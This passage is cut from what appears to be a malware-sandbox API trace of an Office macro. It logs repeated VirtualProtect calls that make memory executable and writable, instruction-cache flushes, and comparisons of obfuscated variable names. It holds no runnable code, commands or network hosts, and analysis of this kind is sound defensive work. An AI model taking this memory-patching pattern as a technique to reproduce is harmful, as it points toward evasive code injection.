lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.854] GetCurrentProcess () returned 0xffffffff [0095.854] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0095.854] GetCurrentProcess () returned 0xffffffff [0095.854] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0095.854] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.854] GetCurrentProcess () returned 0xffffffff [0095.854] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0095.854] GetCurrentProcess () returned 0xffffffff [0095.854] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0095.854] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.855] GetCurrentProcess () returned 0xffffffff [0095.855] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0095.855] GetCurrentProcess () returned 0xffffffff [0095.855] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0095.855] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.856] GetCurrentProcess () returned 0xffffffff [0095.856] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0095.856] GetCurrentProcess () returned 0xffffffff [0095.856] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0095.856] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.857] GetCurrentProcess () returned 0xffffffff [0095.857] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0095.857] GetCurrentProcess () returned 0xffffffff [0095.857] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0095.857] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.858] GetCurrentProcess () returned 0xffffffff [0095.858] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0095.858] GetCurrentProcess () returned 0xffffffff [0095.858] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0095.858] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.858] GetCurrentProcess () returned 0xffffffff [0095.858] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0095.858] GetCurrentProcess () returned 0xffffffff [0095.858] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0095.858] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.859] GetCurrentProcess () returned 0xffffffff [0095.859] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0095.859] GetCurrentProcess () returned 0xffffffff [0095.859] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0095.859] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.860] GetCurrentProcess () returned 0xffffffff [0095.860] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0095.860] GetCurrentProcess () returned 0xffffffff [0095.860] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0095.860] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.860] GetCurrentProcess () returned 0xffffffff [0095.860] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0095.861] GetAsyncKeyState (vKey=3) returned 0 [0095.861] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.861] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0095.862] CRetailMalloc_Alloc () returned 0xcc06430 [0095.862] memcpy (in: _Dst=0xb2a5168, _Src=0x19759c, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.862] memcpy (in: _Dst=0xb2a516c, _Src=0x197568, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0095.862] memcpy (in: _Dst=0xb2a516c, _Src=0x1973d4, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0095.862] memcpy (in: _Dst=0xb2a516c, _Src=0x197568, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0095.862] memcpy (in: _Dst=0xb2a5170, _Src=0x19759c, _Size=0x4 | out: _Dst=0xb2a5170) returned 0xb2a5170 [0095.862] memcpy (in: _Dst=0xb2a516c, _Src=0x197548, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0095.862] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x96\x96\x97\x97\x96\x96\x96\x97\x96\x96\x97\x96\x97\x96\x97\x96", cchCount1=-1, lpString2="\x97\x96\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x97\x97\x97\x97\x96\x97\x96", cchCount2=-1) returned 3 [0095.862] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x96\x96\x97\x96\x96\x97\x97\x97\x97\x96\x96\x97\x97\x97\x97\x97", cchCount1=-1, lpString2="\x97\x96\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x97\x97\x97\x97\x96\x97\x96", cchCount2=-1) returned 3 [0095.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a82e0a, cbMultiByte=20, lpWideCharStr=0x197348, cchWideChar=21 | out: lpWideCharStr="—––—–—–—–—––————–—–") returned 20 [0095.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40686, cbMultiByte=20, lpWideCharStr=0x1973a8, cchWideChar=21 | out: lpWideCharStr="—––—–—–—–—––————–—–") returned 20 [0095.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40686, cbMultiByte=20, lpWideCharStr=0x1973a8, cchWideChar=21 | out: lpWideCharStr="—––—–—–—–—––————–—–") returned 20 [0095.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40686, cbMultiByte=20, lpWideCharStr=0x1973a8, cchWideChar=21 | out: lpWideCharStr="—––—–—–—–—––————–—–") returned 20 [0095.863] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x96\x96\x97\x97\x96\x96\x96\x97\x96\x96\x97\x96\x97\x96\x97\x96", cchCount1=-1, lpString2="\x97\x96\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x97\x97\x97\x97\x96\x97\x96", cchCount2=-1) returned 3 [0095.863] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x96\x96\x97\x96\x96\x97\x97\x97\x97\x96\x96\x97\x97\x97\x97\x97", cchCount1=-1, lpString2="\x97\x96\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x97\x97\x97\x97\x96\x97\x96", cchCount2=-1) returned 3 [0095.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40686, cbMultiByte=20, lpWideCharStr=0x1973a8, cchWideChar=21 | out: lpWideCharStr="—––—–—–—–—––————–—–") returned 20 [0095.863] CRetailMalloc_Alloc () returned 0xf4f43c8 [0095.863] _mbscpy_s (in: _Dst=0xf4f43c8, _DstSizeInBytes=0x14, _Src=0x9a40686 | out: _Dst=0xf4f43c8) returned 0x0 [0095.863] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="_B_var_\x97\x97\x97\x96\x96\x97\x96\x96\x97\x97\x97\x97\x96\x96\x97\x97\x97\x97\x97", cchCount1=-1, lpString2="_B_var_\x97\x96\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x97\x97\x97\x97\x96\x97\x96", cchCount2=-1) returned 3 [0095.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40b7e, cbMultiByte=27, lpWideCharStr=0x1973b8, cchWideChar=28 | out: lpWideCharStr="_B_var_—––—–—–—–—––————–—–") returned 27 [0095.864] CRetailMalloc_Free () returned 0x1 [0095.864] _mbscpy_s (in: _Dst=0x1974d0, _DstSizeInBytes=0x1d, _Src=0x9a4071e | out: _Dst=0x1974d0) returned 0x0 [0095.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb42fc08, cbMultiByte=7, lpWideCharStr=0x9be0c9c, cchWideChar=16 | out: lpWideCharStr="NdP4AZL") returned 7 [0095.864] memcpy (in: _Dst=0xf4d40d4, _Src=0x9be0c98, _Size=0x14 | out: _Dst=0xf4d40d4) returned 0xf4d40d4 [0095.864] memcpy (in: _Dst=0xb2a5168, _Src=0x19759c, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.864] memcpy (in: _Dst=0xb2a5168, _Src=0x197568, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb42fc1a, cbMultiByte=12, lpWideCharStr=0x9be104c, cchWideChar=26 | out: lpWideCharStr="muVOil0XYg2e") returned 12 [0095.864] memcpy (in: _Dst=0xf4d40ec, _Src=0x9be1048, _Size=0x1e | out: _Dst=0xf4d40ec) returned 0xf4d40ec [0095.864] memcpy (in: _Dst=0xb2a516c, _Src=0x19759c, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0095.864] memcpy (in: _Dst=0xb2a516c, _Src=0x197568, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0095.864] memcpy (in: _Dst=0xb2a5168, _Src=0x197548, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.864] memcpy (in: _Dst=0xb2a5168, _Src=0x197568, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.864] memcpy (in: _Dst=0xb2a516c, _Src=0x19759c, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0095.864] memcpy (in: _Dst=0xb2a5170, _Src=0x197568, _Size=0x4 | out: _Dst=0xb2a5170) returned 0xb2a5170 [0095.864] memcpy (in: _Dst=0xb2a5170, _Src=0x1973d4, _Size=0x4 | out: _Dst=0xb2a5170) returned 0xb2a5170 [0095.865] memcpy (in: _Dst=0xb2a5170, _Src=0x197568, _Size=0x4 | out: _Dst=0xb2a5170) returned 0xb2a5170 [0095.865] memcpy (in: _Dst=0xb2a5174, _Src=0x19759c, _Size=0x4 | out: _Dst=0xb2a5174) returned 0xb2a5174 [0095.865] memcpy (in: _Dst=0xb2a5170, _Src=0x197548, _Size=0x4 | out: _Dst=0xb2a5170) returned 0xb2a5170 [0095.865] memcpy (in: _Dst=0xb2a5174, _Src=0x19759c, _Size=0x4 | out: _Dst=0xb2a5174) returned 0xb2a5174 [0095.865] memcpy (in: _Dst=0xb2a5270, _Src=0x19754c, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0095.865] memcpy (in: _Dst=0xb2a5168, _Src=0x197568, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.865] memcpy (in: _Dst=0xb2a516c, _Src=0x19759c, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0095.865] memcpy (in: _Dst=0xb2a5168, _Src=0x197548, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.865] memcpy (in: _Dst=0xb2a5168, _Src=0x19759c, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.865] memcpy (in: _Dst=0xb2a516c, _Src=0x197568, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0095.865] memcpy (in: _Dst=0xb2a5170, _Src=0x197568, _Size=0x4 | out: _Dst=0xb2a5170) returned 0xb2a5170 [0095.865] memcpy (in: _Dst=0xb2a5174, _Src=0x197568, _Size=0x4 | out: _Dst=0xb2a5174) returned 0xb2a5174 [0095.865] memcpy (in: _Dst=0xb2a5170, _Src=0x197568, _Size=0x4 | out: _Dst=0xb2a5170) returned 0xb2a5170 [0095.865] memcpy (in: _Dst=0xb2a516c, _Src=0x197548, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0095.865] memcpy (in: _Dst=0xb2a5170, _Src=0x197568, _Size=0x4 | out: _Dst=0xb2a5170) returned 0xb2a5170 [0095.865] memcpy (in: _Dst=0xb2a5174, _Src=0x197568, _Size=0x4 | out: _Dst=0xb2a5174) returned 0xb2a5174 [0095.865] memcpy (in: _Dst=0xb2a5178, _Src=0x19759c, _Size=0x4 | out: _Dst=0xb2a5178) returned 0xb2a5178 [0095.865] memcpy (in: _Dst=0xb2a5174, _Src=0x197548, _Size=0x4 | out: _Dst=0xb2a5174) returned 0xb2a5174 [0095.865] memcpy (in: _Dst=0xb2a5170, _Src=0x197568, _Size=0x4 | out: _Dst=0xb2a5170) returned 0xb2a5170 [0095.865] memcpy (in: _Dst=0xb2a516c, _Src=0x197548, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0095.865] memcpy (in: _Dst=0xb2a516c, _Src=0x1973d4, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0095.865] memcpy (in: _Dst=0xb2a516c, _Src=0x197568, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0095.865] memcpy (in: _Dst=0xb2a5168, _Src=0x197548, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.865] memcpy (in: _Dst=0xb2a516c, _Src=0x197568, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0095.866] memcpy (in: _Dst=0xb2a5168, _Src=0x197568, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.866] memcpy (in: _Dst=0xcc064f7, _Src=0x1974fc, _Size=0x1 | out: _Dst=0xcc064f7) returned 0xcc064f7 [0095.866] memcpy (in: _Dst=0xcc06590, _Src=0x197604, _Size=0x18 | out: _Dst=0xcc06590) returned 0xcc06590 [0095.867] CRetailMalloc_Realloc () returned 0xcc06430 [0095.867] CRetailMalloc_Free () returned 0x1 [0095.867] GetCurrentProcess () returned 0xffffffff [0095.867] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0095.867] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.872] GetCurrentProcess () returned 0xffffffff [0095.872] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0095.872] GetCurrentProcess () returned 0xffffffff [0095.872] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0095.872] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.873] GetCurrentProcess () returned 0xffffffff [0095.873] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0095.873] GetCurrentProcess () returned 0xffffffff [0095.873] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0095.873] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.873] GetCurrentProcess () returned 0xffffffff [0095.873] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0095.874] GetCurrentProcess () returned 0xffffffff [0095.874] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0095.874] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.874] GetCurrentProcess () returned 0xffffffff [0095.874] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0095.874] GetCurrentProcess () returned 0xffffffff [0095.874] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0095.874] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.875] GetCurrentProcess () returned 0xffffffff [0095.875] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0095.875] GetCurrentProcess () returned 0xffffffff [0095.875] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0095.875] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.876] GetCurrentProcess () returned 0xffffffff [0095.876] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0095.876] GetCurrentProcess () returned 0xffffffff [0095.876] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0095.876] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.877] GetCurrentProcess () returned 0xffffffff [0095.877] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0095.877] GetCurrentProcess () returned 0xffffffff [0095.877] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0095.877] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.877] GetCurrentProcess () returned 0xffffffff [0095.877] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0095.877] GetCurrentProcess () returned 0xffffffff [0095.877] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0095.877] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.878] GetCurrentProcess () returned 0xffffffff [0095.878] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0095.878] GetCurrentProcess () returned 0xffffffff [0095.878] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0095.878] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.879] GetCurrentProcess () returned 0xffffffff [0095.879] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0095.879] GetCurrentProcess () returned 0xffffffff [0095.879] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0095.879] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.879] GetCurrentProcess () returned 0xffffffff [0095.879] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0095.880] GetCurrentProcess () returned 0xffffffff [0095.880] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0095.880] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.880] GetCurrentProcess () returned 0xffffffff [0095.880] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0095.880] GetCurrentProcess () returned 0xffffffff [0095.880] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0095.880] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.881] GetCurrentProcess () returned 0xffffffff [0095.881] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0095.881] GetCurrentProcess () returned 0xffffffff [0095.881] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0095.881] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.882] GetCurrentProcess () returned 0xffffffff [0095.882] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0095.882] GetCurrentProcess () returned 0xffffffff [0095.882] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0095.882] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.882] GetCurrentProcess () returned 0xffffffff [0095.882] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0095.882] GetCurrentProcess () returned 0xffffffff [0095.883] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0095.883] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.884] GetCurrentProcess () returned 0xffffffff [0095.884] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0095.884] GetCurrentProcess () returned 0xffffffff [0095.884] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0095.884] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.884] GetCurrentProcess () returned 0xffffffff [0095.884] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0095.884] GetCurrentProcess () returned 0xffffffff [0095.884] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0095.884] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.885] GetCurrentProcess () returned 0xffffffff [0095.885] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0095.885] GetCurrentProcess () returned 0xffffffff [0095.885] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0095.885] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.886] GetCurrentProcess () returned 0xffffffff [0095.886] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0095.886] GetCurrentProcess () returned 0xffffffff [0095.886] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0095.886] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.886] GetCurrentProcess () returned 0xffffffff [0095.887] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0095.887] GetCurrentProcess () returned 0xffffffff [0095.887] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0095.887] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.887] GetCurrentProcess () returned 0xffffffff [0095.887] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0095.887] GetCurrentProcess () returned 0xffffffff [0095.887] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0095.887] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.888] GetCurrentProcess () returned 0xffffffff [0095.888] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0095.888] GetCurrentProcess () returned 0xffffffff [0095.888] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0095.888] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.889] GetCurrentProcess () returned 0xffffffff [0095.889] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0095.889] GetCurrentProcess () returned 0xffffffff [0095.889] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0095.889] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.889] GetCurrentProcess () returned 0xffffffff [0095.889] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0095.889] GetCurrentProcess () returned 0xffffffff [0095.889] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0095.889] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.890] GetCurrentProcess () returned 0xffffffff [0095.890] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0095.890] GetCurrentProcess () returned 0xffffffff [0095.890] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0095.890] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0095.891] GetCurrentProcess () returned 0xffffffff [0095.891] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0095.891] GetCurrentProcess () returned 0xffffffff [0095.891] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0095.891] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: 